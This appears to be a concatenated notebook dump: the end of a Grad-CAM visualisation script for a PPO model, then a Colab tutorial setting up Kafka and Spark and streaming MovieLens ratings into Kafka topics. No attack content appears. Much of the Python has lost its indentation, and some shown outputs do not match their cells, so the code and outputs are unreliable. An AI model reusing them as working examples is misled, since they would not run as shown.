model_out_layer = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_1/ppo_head_0/policy:0')
loss = tf.multiply(model_out_layer, tf.one_hot([category_index], num_of_actions))
reduced_loss = tf.reduce_sum(loss[0])
conv_output = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_1/observation/Conv2d_4/Conv2D:0')
grads = tf.gradients(reduced_loss, conv_output)[0]
output, grads_val = sess.run([conv_output, grads], feed_dict=feed_dict)
weights = np.mean(grads_val, axis=(1, 2))
cams = np.sum(weights * output, axis=3)
##im_h, im_w = 120, 160##
im_h, im_w = rgb_img.shape[:2]
cam = cams[0] #img 0
image = np.uint8(rgb_img[:, :, ::-1] * 255.0) # RGB -> BGR
cam = cv2.resize(cam, (im_w, im_h)) # zoom heatmap
cam = np.maximum(cam, 0) # relu clip
heatmap = cam / np.max(cam) # normalize
cam = cv2.applyColorMap(np.uint8(255 * heatmap), cv2.COLORMAP_JET) # grayscale to color
cam = np.float32(cam) + np.float32(image) # overlay heatmap
    cam = 255 * cam / (np.max(cam) + 1E-5) ## Add epsilon for stability
cam = np.uint8(cam)[:, :, ::-1] # to RGB
return cam
import glob
img_path = "simulation_episode/"
all_files = sorted(glob.glob(img_path + '/*.png'))
model_path = GRAPH_PB_PATH + 'model_30.pb' #Change this to your model 'pb' frozen graph file
model, obs, model_out = load_session(model_path)
heatmaps = []
for f in all_files[:5]:
img = np.array(Image.open(f))
heatmap = visualize_gradcam_discrete_ppo(model, img, category_index=0, num_of_actions=10)
heatmaps.append(heatmap)
tf.reset_default_graph()
plt.imshow(heatmaps[0])
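# Optional sketch: show the first few Grad-CAM overlays side by side
fig, axes = plt.subplots(1, len(heatmaps), figsize=(4 * len(heatmaps), 4))
for ax, hm in zip(axes, heatmaps):
    ax.imshow(hm)
    ax.axis('off')
plt.show()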
###Output
_____no_output_____ |
_notebooks/2021-06-25-kafka-spark-streaming-colab.ipynb | ###Markdown
Kafka and Spark Streaming in Colab> Installing Kafka and Spark streaming in colab and streaming movielens dataset- toc: true- badges: true- comments: true- categories: [spark, pyspark, kafka, movie]- image:  There are several benefits of implementing Spark-Kafka integration. You can ensure minimum data loss through Spark Streaming while saving all the received Kafka data synchronously for an easy recovery. Users can read messages from a single topic or multiple Kafka topics. Along with this level of flexibility you can also access high scalability, throughput and fault-tolerance and a range of other benefits by using Spark and Kafka in tandem. This integration can be understood with a data pipeline that functions in the methodology shown below: 
###Code
!pip install kafka-python
###Output
Collecting kafka-python
[?25l Downloading https://files.pythonhosted.org/packages/75/68/dcb0db055309f680ab2931a3eeb22d865604b638acf8c914bedf4c1a0c8c/kafka_python-2.0.2-py2.py3-none-any.whl (246kB)
[K |█▎ | 10kB 12.5MB/s eta 0:00:01
[K |██▋ | 20kB 18.6MB/s eta 0:00:01
[K |████ | 30kB 20.3MB/s eta 0:00:01
[K |█████▎ | 40kB 16.8MB/s eta 0:00:01
[K |██████▋ | 51kB 9.2MB/s eta 0:00:01
[K |████████ | 61kB 10.6MB/s eta 0:00:01
[K |█████████▎ | 71kB 8.7MB/s eta 0:00:01
[K |██████████▋ | 81kB 9.3MB/s eta 0:00:01
[K |████████████ | 92kB 10.2MB/s eta 0:00:01
[K |█████████████▎ | 102kB 7.0MB/s eta 0:00:01
[K |██████████████▋ | 112kB 7.0MB/s eta 0:00:01
[K |████████████████ | 122kB 7.0MB/s eta 0:00:01
[K |█████████████████▎ | 133kB 7.0MB/s eta 0:00:01
[K |██████████████████▋ | 143kB 7.0MB/s eta 0:00:01
[K |████████████████████ | 153kB 7.0MB/s eta 0:00:01
[K |█████████████████████▎ | 163kB 7.0MB/s eta 0:00:01
[K |██████████████████████▋ | 174kB 7.0MB/s eta 0:00:01
[K |████████████████████████ | 184kB 7.0MB/s eta 0:00:01
[K |█████████████████████████▎ | 194kB 7.0MB/s eta 0:00:01
[K |██████████████████████████▋ | 204kB 7.0MB/s eta 0:00:01
[K |████████████████████████████ | 215kB 7.0MB/s eta 0:00:01
[K |█████████████████████████████▎ | 225kB 7.0MB/s eta 0:00:01
[K |██████████████████████████████▋ | 235kB 7.0MB/s eta 0:00:01
[K |████████████████████████████████| 245kB 7.0MB/s eta 0:00:01
[K |████████████████████████████████| 256kB 7.0MB/s
[?25hInstalling collected packages: kafka-python
Successfully installed kafka-python-2.0.2
###Markdown
Import packages
###Code
import os
from datetime import datetime
import time
import threading
import json
from kafka import KafkaProducer
from kafka.errors import KafkaError
import pandas as pd
from sklearn.model_selection import train_test_split
###Output
_____no_output_____
###Markdown
Download and set up Kafka and Zookeeper instances. For demo purposes, the following instances are set up locally: - Kafka (Brokers: 127.0.0.1:9092) - Zookeeper (Node: 127.0.0.1:2181)
###Code
!curl -sSOL https://downloads.apache.org/kafka/2.7.0/kafka_2.13-2.7.0.tgz
!tar -xzf kafka_2.13-2.7.0.tgz
###Output
_____no_output_____
###Markdown
Using the default configurations (provided by Apache Kafka) for spinning up the instances.
###Code
!./kafka_2.13-2.7.0/bin/zookeeper-server-start.sh -daemon ./kafka_2.13-2.7.0/config/zookeeper.properties
!./kafka_2.13-2.7.0/bin/kafka-server-start.sh -daemon ./kafka_2.13-2.7.0/config/server.properties
!echo "Waiting for 10 secs until kafka and zookeeper services are up and running"
!sleep 10
###Output
Waiting for 10 secs until kafka and zookeeper services are up and running
###Markdown
Once the instances are started as daemon processes, grep for `kafka` in the processes list. The two java processes correspond to zookeeper and the kafka instances.
###Code
!ps -ef | grep kafka
###Output
root 406 359 5 04:12 ? 00:00:16 /usr/lib/jvm/java-8-openjdk-amd64/bin/java -cp /content/spark-3.1.2-bin-hadoop3.2/conf/:/content/spark-3.1.2-bin-hadoop3.2/jars/* -Xmx1g org.apache.spark.deploy.SparkSubmit --conf spark.jars.packages=org.apache.spark:spark-sql-kafka-0-10_2.11:2.4.5 pyspark-shell
root 901 1 11 04:17 ? 00:00:01 /usr/lib/jvm/java-8-openjdk-amd64/bin/java -Xmx512M -Xms512M -server -XX:+UseG1GC -XX:MaxGCPauseMillis=20 -XX:InitiatingHeapOccupancyPercent=35 -XX:+ExplicitGCInvokesConcurrent -XX:MaxInlineLevel=15 -Djava.awt.headless=true -Xloggc:/content/kafka_2.13-2.7.0/bin/../logs/zookeeper-gc.log -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintGCTimeStamps -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=10 -XX:GCLogFileSize=100M -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Dkafka.logs.dir=/content/kafka_2.13-2.7.0/bin/../logs -Dlog4j.configuration=file:./kafka_2.13-2.7.0/bin/../config/log4j.properties -cp /content/kafka_2.13-2.7.0/bin/../libs/activation-1.1.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/aopalliance-repackaged-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/argparse4j-0.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/audience-annotations-0.5.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/commons-cli-1.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/commons-lang3-3.8.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-api-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-basic-auth-extension-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-file-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-json-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-mirror-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-mirror-client-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-runtime-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-transforms-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-api-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-locator-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-utils-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-annotations-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-core-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-databind-2.10.5.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-dataformat-csv-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-datatype-jdk8-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-jaxrs-base-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-jaxrs-json-provider-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-jaxb-annotations-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-paranamer-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-scala_2.13-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.activation-api-1.2.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.annotation-api-1.3.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.inject-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.validation-api-2.0.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.ws.rs-api-2.1.6.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.xml.bind-api-2.3.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/javassist-3.25.0-GA.jar:/content/kafka_2.13-2.7.0/bin/../libs/javassist-3.26.0-GA.jar:/content/kafka_2.13-2.7.0/bin/../libs/javax.servlet-api-3.1.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/javax.ws.rs-api-2.1.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jaxb-api-2.3.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-client-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-common-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-container-servlet-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-container-servlet-core-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jer
sey-hk2-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-media-jaxb-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-server-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-client-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-continuation-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-http-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-io-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-security-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-server-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-servlet-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-servlets-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-util-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jopt-simple-5.0.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka_2.13-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka_2.13-2.7.0-sources.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-clients-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-log4j-appender-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-raft-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-examples-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-scala_2.13-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-test-utils-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-tools-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/log4j-1.2.17.jar:/content/kafka_2.13-2.7.0/bin/../libs/lz4-java-1.7.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/maven-artifact-3.6.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/metrics-core-2.2.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-buffer-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-codec-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-common-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-handler-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-resolver-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-native-epoll-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-native-unix-common-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/osgi-resource-locator-1.0.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/paranamer-2.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/plexus-utils-3.2.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/reflections-0.9.12.jar:/content/kafka_2.13-2.7.0/bin/../libs/rocksdbjni-5.18.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-collection-compat_2.13-2.2.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-java8-compat_2.13-0.9.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-library-2.13.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-logging_2.13-3.9.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-reflect-2.13.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/slf4j-api-1.7.30.jar:/content/kafka_2.13-2.7.0/bin/../libs/slf4j-log4j12-1.7.30.jar:/content/kafka_2.13-2.7.0/bin/../libs/snappy-java-1.1.7.7.jar:/content/kafka_2.13-2.7.0/bin/../libs/zookeeper-3.5.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/zookeeper-jute-3.5.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/zstd-jni-1.4.5-6.jar org.apache.zookeeper.server.quorum.QuorumPeerMain ./kafka_2.13-2.7.0/config/zookeeper.properties
root 1254 1 57 04:17 ? 00:00:05 /usr/lib/jvm/java-8-openjdk-amd64/bin/java -Xmx1G -Xms1G -server -XX:+UseG1GC -XX:MaxGCPauseMillis=20 -XX:InitiatingHeapOccupancyPercent=35 -XX:+ExplicitGCInvokesConcurrent -XX:MaxInlineLevel=15 -Djava.awt.headless=true -Xloggc:/content/kafka_2.13-2.7.0/bin/../logs/kafkaServer-gc.log -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintGCTimeStamps -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=10 -XX:GCLogFileSize=100M -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Dkafka.logs.dir=/content/kafka_2.13-2.7.0/bin/../logs -Dlog4j.configuration=file:./kafka_2.13-2.7.0/bin/../config/log4j.properties -cp /content/kafka_2.13-2.7.0/bin/../libs/activation-1.1.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/aopalliance-repackaged-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/argparse4j-0.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/audience-annotations-0.5.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/commons-cli-1.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/commons-lang3-3.8.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-api-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-basic-auth-extension-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-file-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-json-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-mirror-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-mirror-client-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-runtime-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-transforms-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-api-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-locator-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-utils-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-annotations-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-core-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-databind-2.10.5.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-dataformat-csv-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-datatype-jdk8-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-jaxrs-base-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-jaxrs-json-provider-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-jaxb-annotations-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-paranamer-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-scala_2.13-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.activation-api-1.2.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.annotation-api-1.3.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.inject-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.validation-api-2.0.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.ws.rs-api-2.1.6.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.xml.bind-api-2.3.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/javassist-3.25.0-GA.jar:/content/kafka_2.13-2.7.0/bin/../libs/javassist-3.26.0-GA.jar:/content/kafka_2.13-2.7.0/bin/../libs/javax.servlet-api-3.1.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/javax.ws.rs-api-2.1.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jaxb-api-2.3.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-client-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-common-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-container-servlet-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-container-servlet-core-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jers
ey-hk2-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-media-jaxb-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-server-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-client-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-continuation-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-http-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-io-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-security-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-server-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-servlet-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-servlets-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-util-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jopt-simple-5.0.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka_2.13-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka_2.13-2.7.0-sources.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-clients-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-log4j-appender-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-raft-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-examples-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-scala_2.13-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-test-utils-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-tools-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/log4j-1.2.17.jar:/content/kafka_2.13-2.7.0/bin/../libs/lz4-java-1.7.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/maven-artifact-3.6.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/metrics-core-2.2.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-buffer-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-codec-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-common-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-handler-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-resolver-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-native-epoll-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-native-unix-common-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/osgi-resource-locator-1.0.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/paranamer-2.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/plexus-utils-3.2.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/reflections-0.9.12.jar:/content/kafka_2.13-2.7.0/bin/../libs/rocksdbjni-5.18.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-collection-compat_2.13-2.2.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-java8-compat_2.13-0.9.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-library-2.13.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-logging_2.13-3.9.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-reflect-2.13.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/slf4j-api-1.7.30.jar:/content/kafka_2.13-2.7.0/bin/../libs/slf4j-log4j12-1.7.30.jar:/content/kafka_2.13-2.7.0/bin/../libs/snappy-java-1.1.7.7.jar:/content/kafka_2.13-2.7.0/bin/../libs/zookeeper-3.5.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/zookeeper-jute-3.5.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/zstd-jni-1.4.5-6.jar kafka.Kafka ./kafka_2.13-2.7.0/config/server.properties
root 1329 359 0 04:18 ? 00:00:00 /bin/bash -c ps -ef | grep kafka
root 1331 1329 0 04:18 ? 00:00:00 grep kafka
###Markdown
Create the kafka topics with the following specs: - reco-train: partitions=1, replication-factor=1 - reco-test: partitions=2, replication-factor=1
###Code
!./kafka_2.13-2.7.0/bin/kafka-topics.sh --create --bootstrap-server 127.0.0.1:9092 --replication-factor 1 --partitions 1 --topic reco-train
!./kafka_2.13-2.7.0/bin/kafka-topics.sh --create --bootstrap-server 127.0.0.1:9092 --replication-factor 1 --partitions 2 --topic reco-test
###Output
Created topic reco-train.
Created topic reco-test.
###Markdown
Describe the topic for details on the configuration
###Code
!./kafka_2.13-2.7.0/bin/kafka-topics.sh --describe --bootstrap-server 127.0.0.1:9092 --topic reco-train
!./kafka_2.13-2.7.0/bin/kafka-topics.sh --describe --bootstrap-server 127.0.0.1:9092 --topic reco-test
###Output
Topic: reco-train PartitionCount: 1 ReplicationFactor: 1 Configs: segment.bytes=1073741824
Topic: reco-train Partition: 0 Leader: 0 Replicas: 0 Isr: 0
Topic: reco-test PartitionCount: 2 ReplicationFactor: 1 Configs: segment.bytes=1073741824
Topic: reco-test Partition: 0 Leader: 0 Replicas: 0 Isr: 0
Topic: reco-test Partition: 1 Leader: 0 Replicas: 0 Isr: 0
###Markdown
The replication factor of 1 indicates that the data is not being replicated. This is due to the presence of a single broker in our kafka setup. In production systems, the number of bootstrap servers can be in the range of 100s of nodes. That is where fault-tolerance using replication comes into the picture. Please refer to the [docs](https://kafka.apache.org/documentation/replication) for more details. Movielens Dataset. Kafka, being an event streaming platform, enables data from various sources to be written into it. For instance: - Web traffic logs - Astronomical measurements - IoT sensor data - Product reviews, and many more. For the purpose of this tutorial, let's download the [Movielens](https://github.com/sparsh-ai/reco-data/blob/master/MovieLens_100K_ratings.csv?raw=true) dataset and feed the data into kafka manually.
###Code
!wget -O ml_ratings.csv https://github.com/sparsh-ai/reco-data/blob/master/MovieLens_100K_ratings.csv?raw=true
###Output
--2021-06-25 04:18:18-- https://github.com/sparsh-ai/reco-data/blob/master/MovieLens_100K_ratings.csv?raw=true
Resolving github.com (github.com)... 192.30.255.112
Connecting to github.com (github.com)|192.30.255.112|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://github.com/sparsh-ai/reco-data/raw/master/MovieLens_100K_ratings.csv [following]
--2021-06-25 04:18:19-- https://github.com/sparsh-ai/reco-data/raw/master/MovieLens_100K_ratings.csv
Reusing existing connection to github.com:443.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/sparsh-ai/reco-data/master/MovieLens_100K_ratings.csv [following]
--2021-06-25 04:18:19-- https://raw.githubusercontent.com/sparsh-ai/reco-data/master/MovieLens_100K_ratings.csv
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2179205 (2.1M) [text/plain]
Saving to: ‘ml_ratings.csv’
ml_ratings.csv 100%[===================>] 2.08M --.-KB/s in 0.1s
2021-06-25 04:18:20 (20.4 MB/s) - ‘ml_ratings.csv’ saved [2179205/2179205]
###Markdown
Explore the dataset
###Code
movielens_df = pd.read_csv('ml_ratings.csv')
movielens_df.head()
# Number of datapoints and columns
len(movielens_df), len(movielens_df.columns)
###Output
_____no_output_____
###Markdown
Split the dataset
###Code
train_df, test_df = train_test_split(movielens_df, test_size=0.4, shuffle=True)
print("Number of training samples: ",len(train_df))
print("Number of testing sample: ",len(test_df))
x_train_df = train_df.drop(["Rating"], axis=1)
y_train_df = train_df["Rating"]
x_test_df = test_df.drop(["Rating"], axis=1)
y_test_df = test_df["Rating"]
# The labels are set as the kafka message keys so as to store data
# in multiple-partitions. Thus, enabling efficient data retrieval
# using the consumer groups.
x_train = list(filter(None, x_train_df.to_csv(index=False).split("\n")[1:]))
y_train = list(filter(None, y_train_df.to_csv(index=False).split("\n")[1:]))
x_test = list(filter(None, x_test_df.to_csv(index=False).split("\n")[1:]))
y_test = list(filter(None, y_test_df.to_csv(index=False).split("\n")[1:]))
NUM_COLUMNS = len(x_train_df.columns)
len(x_train), len(y_train), len(x_test), len(y_test)
###Output
_____no_output_____
###Markdown
Store the train and test data in kafka. Storing the data in kafka simulates an environment for continuous remote data retrieval for training and inference purposes.
###Code
def error_callback(exc):
    raise Exception('Error while sending data to kafka: {0}'.format(str(exc)))
def write_to_kafka(topic_name, items):
count=0
producer = KafkaProducer(bootstrap_servers=['127.0.0.1:9092'])
for message, key in items:
producer.send(topic_name, key=key.encode('utf-8'), value=message.encode('utf-8')).add_errback(error_callback)
count+=1
producer.flush()
print("Wrote {0} messages into topic: {1}".format(count, topic_name))
write_to_kafka("reco-train", zip(x_train, y_train))
write_to_kafka("reco-test", zip(x_test, y_test))
# ! /content/kafka_2.13-2.7.0/bin/kafka-console-consumer.sh \
# --bootstrap-server localhost:9092 \
# --topic reco-train \
# --from-beginning
###Output
Processed a total of 60000 messages
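###Markdown
As an optional sanity check, you can read a few messages back from the topic with kafka-python's `KafkaConsumer`. This is just a sketch to confirm the writes landed; it is not required for the rest of the tutorial.
###Code
from kafka import KafkaConsumer

consumer = KafkaConsumer(
    'reco-train',
    bootstrap_servers=['127.0.0.1:9092'],
    auto_offset_reset='earliest',
    consumer_timeout_ms=5000)  # stop iterating if no message arrives for 5 seconds
for i, msg in enumerate(consumer):
    print(msg.key, msg.value)
    if i >= 4:
        break
consumer.close()
###Output
_____no_output_____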
###Markdown
Spark Streaming
###Code
!apt-get install openjdk-8-jdk-headless -qq > /dev/null
!wget https://downloads.apache.org/spark/spark-2.4.8/spark-2.4.8-bin-hadoop2.7.tgz
!tar -xvf spark-2.4.8-bin-hadoop2.7.tgz
!pip install findspark
!wget "https://repo1.maven.org/maven2/org/apache/spark/spark-streaming-kafka-0-8-assembly_2.11/2.4.8/spark-streaming-kafka-0-8-assembly_2.11-2.4.8.jar"
import os
os.environ["JAVA_HOME"] = "/usr/lib/jvm/java-8-openjdk-amd64"
os.environ["SPARK_HOME"] = "/content/spark-2.4.8-bin-hadoop2.7"
os.environ['PYSPARK_SUBMIT_ARGS'] = '--jars /content/spark-streaming-kafka-0-8-assembly_2.11-2.4.8.jar pyspark-shell'
import findspark
findspark.init()
from pyspark.sql import SparkSession
from pyspark.sql.functions import *
from pyspark.ml.feature import Normalizer, StandardScaler
import random
import pyspark
import sys
